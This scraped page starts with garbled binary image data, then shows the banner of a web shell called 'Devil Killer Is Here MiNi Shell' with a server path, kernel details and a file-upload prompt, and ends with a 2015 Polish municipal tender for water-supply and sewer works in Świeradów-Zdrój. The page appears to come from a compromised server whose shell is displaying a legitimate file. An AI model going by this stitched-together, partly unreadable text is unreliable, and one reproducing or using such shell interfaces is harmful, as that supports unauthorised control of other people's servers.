JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150204/25080-N-2015.html

<p class="kh_header"><b>Świeradów-Zdrój: Przebudowa ujęcia wody pitnej Bronka Czecha oraz budowa sieci wodociągowej, kanalizacji sanitarnej i deszczowej w Świeradowie-Zdroju</b><br>
<b>Numer ogłoszenia: 25080 - 2015; data zamieszczenia: 04.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ujęcia wody pitnej Bronka Czecha oraz budowa sieci wodociągowej, kanalizacji sanitarnej i deszczowej w Świeradowie-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie zamówienia pn.: Przebudowa ujęcia wody pitnej Bronka Czecha oraz budowa sieci wodociągowej, kanalizacji sanitarnej i deszczowej w Świeradowie-Zdroju. Zadanie inwestycyjne  zlokalizowane jest na ul. Bronka Czecha dz. 19, 24, 25, 26, 30 am 4 obr. 4 dz. 15, 23/1, 29/2 am 5 obr. 4, ul. Źródlana dz 15 am2 obr.4.

B. Przedmiot zamówienia obejmuje następujący zakres:
I. przebudowa ujęcia wody Bronka Czecha w Świeradowie-Zdroju
1. kontener socjalno-magazynowy - 1 kpl
1.1. demontaż i wywiezienie istniejącego baraku socjalno-magazynowego,
1.2. budowa nowych fundamentów pod kontener,
1.3. dostawa i montaż nowego kontenera socjalno-magazynowego o wymiarach 6,00mx2,00m, z wydzielonym i wyposażonym pomieszczeniem W-C i wydzielonym pomieszczeniem hydroforowym z pełnym wyposażeniem, wraz z instalacja wodno-kanalizacyjną, instalacją wentylacyjną, instalacją elektryczną i instalacją grzewczą,
1.4. dostawa i montaż zestawu hydroforowego wraz z automatyką,
1.5. wykonanie odcinka sieci wodociągowej z rur PE o średnicy 110mm, długości ok. 40,00m łączącego zestaw hydroforowy z siecią,
1.6. wykonanie odcinka sieci wodociągowej z rur PE o średnicy 110mm, długości ok. 20,00m, za hydroforem,
1.7. rozruch i odbiór techniczny,
1.8. uporządkowanie terenu robót,

2. przyłącze kablowe - 24,00 m
2.1. wykonanie przyłącza elektrycznego kablowego o długości 24,00m, do kontenera,

3. przyłącze wod-kan. - 10,00 m
3.1. wykonanie przyłącza kanalizacji sanitarnej z rur PVC-U o średnicy 160mm, długość 4,00m, do kontenera,
3.2. wykonanie przyłącza wodociągowego z rur PE o średnicy 25mm, długości 6,00m, do kontenera,
3.3. montaż wodomierza DN20, 

4. stacja uzdatniania wody - 1 kpl.
4.1. demontaż istniejącego filtra wraz z automatyką,
4.2. dostawa i montaż filtra automatycznie oczyszczającego się ze zbierakiem ustawionym czasowo wraz z automatyką,
4.3. regeneracja sterylizatora UV, w tym wymiana promienników oraz wymiana uszczelek na nowe,
4.4. montaż nowego zestawu wodomierza głównego sprężonego DN 100/20 w istniejącej komorze wodomierzowej, wraz z filrem siatkowym, zestawem zaworów odcinających oraz zaworem antyskażeniowym,
4.5. rozebranie starej komory wodomierzowej z bloczków poniżej terenu,
4.6. budowa nowej komory wodomierzowej z bloczków betonowych,
4.7. wykonanie i montaż pokrywy na komorze wodomierzowej wraz z jej dociepleniem,
4.8. montaż nowych stopni złazowych w komorze wodomierzowej,

II. budowa sieci wodociągowej, kanalizacji sanitarnej i kanalizacji deszczowej w ul. Br. Czecha w Świeradowie-Zdroju :
1. sieć kanalizacji deszczowej z rur PP - 288,20 m,
w tym:
1.1. sieć kanalizacji deszczowej z rur PP o średnicy 200mm - 49,80 m,
1.2. sieć kanalizacji deszczowej z rur PP o średnicy 250mm - 44,40 m,
1.3. sieć kanalizacji deszczowej z rur PP o średnicy 315mm - 182,00 m,
1.4. sieć kanalizacji deszczowej z rur PP o średnicy 400mm - 12,00 m,
1.5. przykanaliki z rur PP o średnicy 160mm - 46,00 m,

2. sieć kanalizacji sanitarnej z rur PP o średnicy 200mm - 253,50 m,
2.1. odnogi sieci kanalizacji sanitarnej z rur PP o średnicy 160mm - 102,40 m, 

3. sieć wodociągowa z rur PE o średnicy 200mm - 225,00 m
3.1. odnogi sieci wodociągowej z rur PE o średnicy 90mm - 11,00 m,
3.2. odnogi sieci wodociągowej z rur PE o średnicy 63mm - 12,50 m,
3.3. odnogi sieci wodociągowej z rur PE o średnicy 32mm - 24,20 m,
3.4. montaż hydrantu p-poż. naziemnego - 1 kpl. podłączenie z rur PE 90mm - 6,00 m,

III. budowa kanalizacji deszczowej w ul. Źródlanej w Świeradowie-Zdroju
1. sieć kanalizacji deszczowej z rur PP o średnicy 315mm - 64,50 m,
1.1. przykanaliki z rur PP o średnicy 160mm - 9,50 m.
UWAGA! 
1. Terminy:
- zakończenia robót budowlanych do dnia 15 maja 2015 r., przez co rozumie się  termin zakończenia całości robót budowlanych, czyli wybudowanie obiektów budowlanych objętych przedmiotem zamówienia i zgłoszenie do odbioru,
- odbioru  końcowego lub odmowy dokonania odbioru końcowego w terminie do 31 maja 2015r.,
- rozliczenia inwestycji przez Zamawiającego z instytucją współfinansująca tj. Samorządem Województwa Dolnośląskiego do dnia 25 czerwca 2015r.
są terminami ostatecznymi i nieprzekraczalnymi z uwagi na ostateczne zakończenie okresu programowania na lata 2007-2013 i zakończenie  Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.
2. Przy wycenie oferty należy uwzględnić: konieczność zapewnienia nieprzerwanego dojścia do nieruchomości położonych w rejonie placu budowy z uwagi na fakt wyłączenia z ruchu kołowego odcinka ulicy Bronka Czecha na którym realizowane będą roboty budowlane. Zamawiający planuje wykonanie drogi alternatywnej stanowiącej dojazd do górnych rejonów ul. Br. Czecha od strony ul. Strumykowej. Rejon skrzyżowania ulic Br. Czecha i ul. Stromej w zakresie robót ziemnych należy wykonać w jak najkrótszym terminie nieprzekraczającym 7 dni liczonych jako dni wyłączenia z ruchu kołowego tej krzyżówki z uwagi na konieczność zabezpieczenia dojazdów do nieruchomości położonych przy ul. Stromej ich mieszkańcom. Odcinek ul. Źródlanej stanowiącej plac budowy zostanie wyłączony z ruchu pieszego i kołowego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych o wartości do 50% zamówienia podstawowego polegających na powtórzeniu zamówienia tego samego rodzaju na terenie Gminy Świeradów-Zdrój, w szczególności obejmujące:.

1. budowa sieci wodociągowej w ul. Br. Czecha i Heleny Marusarzówny, w tym:
a) sieć wodociągowa z rur PE 100 o średnicy De110mm SDR 17 o długości ok. 200,00m,
b) odnogi sieci wodociągowej do granic nieruchomości - ok. 8 szt. o długości ok. 31,00m, w tym: o średnicy De 663mm - ok. 27,00m z zasuwami Dn50mm, o średnicy De32mm - ok. 4,00m z zasuwami  DN32mm,
c) zasuwa Dn100mm ze skrzynką uliczną, obudową, krążkiem - ok. 1 kpl.,
d) hydrant Dn80mm nadziemny, z zasuwą, skrzynka uliczną, obudową, krążkiem ok. 2 kpl.,
2. budowa sieci kanalizacji sanitarnej w ul. Br. Czecha i Heleny Marusarzówny, w tym:
a) sieć kanalizacji sanitarnej z rur PP o średnicy 200mm, długości ok. 174,00m,
b) odnogi sieci kanalizacji sanitarnej o średnicy 200mm, ok. 1 szt., długości ok. 1,50m,
c) odnogi sieci kanalizacji sanitarnej o średnicy 160mm, ok. 4 szt. o łącznej długości ok.  10,00m,
d) studnie betonowe o średnicy 1000mm, ok. 7 kpl.,
3. budowa sieci kanalizacji deszczowej w ul. Br. Czecha i Heleny Marusarzówny, w tym:
a) sieć kanalizacji deszczowej z rur PP o średnicy 200mm, długości ok. 10,00m,
b) sieć kanalizacji deszczowej z rur PP o średnicy 250mm, długości ok. 41,50m,
c) sieć kanalizacji deszczowej z rur PP o średnicy 315mm, długości ok. 109,50m,
d) odnogi sieci kanalizacji deszczowej o średnicy 200mm, ok. 1 szt., długości ok. 6,00m,
e) odnogi sieci kanalizacji deszczowej o średnicy 160mm, ok. 2 szt., o łącznej długości ok.  9,00m,
f) studnie betonowe o średnicy 1000mm, ok. 6 kpl.,
g) wpusty uliczne o średnicy 500mm, ok. 9 kpl.,
h) odnogi do wpustów ulicznych o średnicy 200mm.
4. wykonanie nawierzchni bitumicznej na ulicy Br. Czecha i Heleny Marusarzówny, szerokość jezdni.  
5 budowa sieci kanalizacji sanitarnej w ul. Stromej, w tym:
a) sieć kanalizacji sanitarnej z rur PP o średnicy 200mm, długości ok. 200,00m,
b) odnogi sieci kanalizacji sanitarnej o średnicy 160mm, 4 szt. o łącznej długości ok. 20,00m,
d) studnie betonowe o średnicy 1000mm, ok. 7 kpl.,

6. budowa sieci kanalizacji deszczowej w ul. Stromej, w tym:
a) sieć kanalizacji deszczowej z rur PP o średnicy 315mm, długości ok. 200,00m,
d) odnogi sieci kanalizacji deszczowej o średnicy 200mm, 4 szt., długości ok. 20,00m,
e) odnogi sieci kanalizacji deszczowej o średnicy 160mm, 2 szt., o łącznej długości ok. 9,00m,
f) studnie betonowe o średnicy 1000mm, ok. 7 kpl.,
g) wpusty uliczne o średnicy 500mm, ok. 9 kpl.,
h) odnogi do wpustów ulicznych o średnicy 200mm</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.10.00-5, 45.23.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium  w następującej  wysokości: 15.000,00 zł (słownie złotych: piętnaście tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności. W celu potwierdzenia, że Wykonawca spełnia warunek nr 1 należy przedłożyć Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych Wykonawca spełnia warunek nr 1 jeżeli przedłoży oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  spełnia warunek dotyczący dysponowania  osobami zdolnymi do wykonania zamówienia tj.  

osobą posiadającą  uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych  w ograniczonym zakresie do pełnienia funkcji kierownika budowy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 91</li>
<li>2 - wartość techniczna - 6</li>
<li>3 - jakość - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadku wystąpienia jednego z następujących zdarzeń:
a) uniemożliwiających lub utrudniających prawidłowe wykonywanie zamówienia lub wykonanie zamówienia w terminie, których Wykonawca lub Zamawiający nie mogli przewidzieć,
b) które mogą negatywnie wpłynąć na trwałość przedmiotu umowy, 
c) narazić  Zamawiającego na szkodę, 
dopuszcza się w umowie zmiany terminu, zakresu, ilości i wysokości płatności, wysokości wynagrodzenia, zmiany harmonogramu rzeczowo-terminowo-finansowego, sposobu wykonania zamówienia.
2. Zakres dopuszczalnych zmian:
a) konieczności zmiany terminu realizacji umowy na roboty budowlane, w przypadku wystąpienia tzw. siły wyższej, tj. przez siłę wyższą  należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od Wykonawcy i Zamawiającego, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Wykonawca i Zamawiający  nie mogli przewidzieć i którym  nie mogli zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla stosunków zobowiązaniowych. Wykonawca  jest zobowiązany niezwłocznie poinformować w formie pisemnej Zamawiającego o fakcie wystąpienia siły wyższej, udowodnić te okoliczności poprzez przedstawienie dokumentacji potwierdzającej wystąpienie zdarzeń mających cechy siły wyższej oraz wskazać zakres i wpływ, jakie zdarzenie  to miało na przebieg realizacji zamówienia,
b) wystąpienia w trakcie wykonywania zamówienia odkrycia co którego istnieje przypuszczenie, iż jest ono związane z zabytkiem lub uzasadnione będzie zawiadomienie konserwatora zabytków w celu dokonania oględzin odkrycia lub w celu zorganizowania badania archeologicznego,
c) wystąpienia warunków geotechnicznych lub geologicznych, odmiennych  nie przewidzianych wcześniej  w badaniach,
d) działań i zaniechań organów władzy publicznej lub instytucji polskich, w tym zmian urzędowych interpretacji przepisów dotyczących wykonywania lub finansowania zamówienia,
e) przerw w wykonywaniu zamówienia wynikających z innych zdarzeń niemożliwych do przewidzenia w chwili zawarcia umowy.
f) zmiana postanowień niniejszej umowy na skutek zmiany powszechnie obowiązującego prawa, z wyłączeniem zmiany stawki VAT.
Termin wykonania zamówienia (umowy) ulega wydłużeniu o czas równy trwaniu warunków atmosferycznych utrudniających terminowe lub prawidłowe wykonanie zamówienia, czasu niezbędnego na zawiadomienie konserwatora zabytków w celu dokonania oględzin odkrycia, lub w celu zorganizowania badania archeologicznego, działaniu siły wyższej, trwaniu nietypowych warunków atmosferycznych, trwaniu warunków geotechnicznych lub geologicznych, podjęciu działań związanych z przeciwdziałaniem zdarzeniom o których mowa  w pkt.e, d, trwaniu przerw w wykonywaniu zamówienia.
g) Zmiana Harmonogramu Rzeczowo-Terminowo-Finansowego może nastąpić w przypadku gdy:
projektant w trybie nadzoru autorskiego wprowadzi zmiany, uniemożliwiające wykonanie umowy z założonym harmonogramem, co będzie wynikać z zatwierdzonego przez Zamawiajacego protokołu konieczności,
realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy wymuszającej konieczność skoordynowania prac i wzajemnych powiązań, co będzie wynikać z zatwierdzonego przez Zamawiającego protokołu konieczności,
zmiana terminu realizacji zamówienia powoduje konieczność dokonania zmiany terminu płatności lub/i wysokości płatności.
h) wystąpienia wad ukrytych dokumentacji projektowej w oparciu o którą wykonywane jest zamówienie, konieczności naniesienia przez projektanta zmian w projekcie, które mają wpływ na termin, realizacji zamówienia, wynagrodzenie;   przez wady ukryte dokumentacji projektowej rozumie się wady  które profesjonalny wykonawca może wykryć poprzez prace w terenie.
i) zmiana sposobu wykonania zamówienia w stosunku do sposobu określonego przed zawarciem umowy, dopuszczalna jest na skutek okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniejszej oferty lub zmiany te są korzystne dla Zamawiającego, a Wykonawca wyrazi na nią zgodę, w szczególności: zaistnienie warunków na terenie budowy wpływających na zakres lub sposób wykonania przedmiotu umowy, termin tj. warunki atmosferyczne, archeologiczne, geologiczne, geotechniczne, hydrologiczne, kolizje z sieciami infrastruktury lub wystąpią inne okoliczności uniemożliwiające wykonanie zamówienia określonego w umowie.
j) zmiana sposobu wykonania zamówienia w stosunku do sposobu określonego przed zawarciem umowy - zmiany technologicznie spowodowane w szczególności następującymi okolicznościami:
pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów eksploatacji lub umożliwiające uzyskanie lepszej jakości przedmiotu umowy, bądź pozwalającej na zaoszczędzenie czasu realizacji,
konieczności wykonania robót budowlanych przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany w obowiązującym prawie.
k) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy wymuszającej konieczność skoordynowania prac i wzajemnych powiązań.
l) zmiany danych osobowych i zmiany osób tj. przedstawicieli  Wykonawcy wymienionych w treści umowy,
ł) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami, nie wymienionych w treści umowy,
m) zmiana danych związanych z obsługą administracyjną umowy np. zmiana rachunku bankowego,
n) z powodu wystąpienia konieczności pomniejszenia zakresu prac określonych niniejszą umową Zamawiający zastrzega sobie możliwość zmniejszenia wynagrodzenia wykonawcy, zostanie to rozliczone jako różnica pomiędzy ceną ofertową a rzeczywistym zakresem wykonanych prac,
o) w przypadku wystąpienia niesprzyjających i nietypowych warunków atmosferycznych dla okresu i miejsca wykonywanych robót, potwierdzonych wpisem do dziennika budowy, odbiegających od wymagań STWiORB.,
p) z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa,
r) z powodu uzasadnionych zamian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez  Zamawiającego lub Wykonawcę, jeżeli zmiany te są  korzystne dla  Zmawiającego,
s) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją  winy którejkolwiek ze stron,
t) powierzenia przez wykonawcę wykonywania robót budowlanych  Podwykonawcy.
u) zmiany ilości i wysokości płatności w przypadku zmiany harmonogramu wykonania prac , jeżeli zmiana ta jest uzasadniona zmianą harmonogramu.
